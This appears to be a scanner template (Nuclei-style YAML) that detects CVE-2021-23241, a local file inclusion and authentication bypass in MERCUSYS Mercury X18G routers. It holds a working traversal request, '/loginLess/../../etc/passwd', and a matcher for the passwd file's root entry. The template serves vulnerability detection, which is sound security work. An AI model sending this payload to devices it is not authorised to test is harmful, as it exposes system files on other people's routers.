37 lines
1.1 KiB
YAML
37 lines
1.1 KiB
YAML
|
id: CVE-2021-23241
|
||
|
|
||
|
info:
|
||
|
name: MERCUSYS Mercury X18G 1.0.5 Router - Local File Inclusion
|
||
|
author: daffainfo
|
||
|
severity: medium
|
||
|
description: MERCUSYS Mercury X18G 1.0.5 devices are vulnerable to local file inclusion via ../ in conjunction with a loginLess or login.htm URI (for authentication bypass) to the web server, as demonstrated by the /loginLess/../../etc/passwd URI.
|
||
|
reference:
|
||
|
- https://github.com/BATTZION/MY_REQUEST/blob/master/Mercury%20Router%20Web%20Server%20Directory%20Traversal.md
|
||
|
- https://www.mercusys.com/en/
|
||
|
- https://www.mercurycom.com.cn/product-521-1.html
|
||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-23241
|
||
|
classification:
|
||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||
|
cvss-score: 5.3
|
||
|
cve-id: CVE-2021-23241
|
||
|
cwe-id: CWE-22
|
||
|
tags: cve,cve2021,iot,lfi,router
|
||
|
|
||
|
http:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/loginLess/../../etc/passwd"
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: regex
|
||
|
regex:
|
||
|
- "root:.*:0:0:"
|
||
|
part: body
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|
||
|
|
||
|
# Enhanced by mp on 2022/07/22
|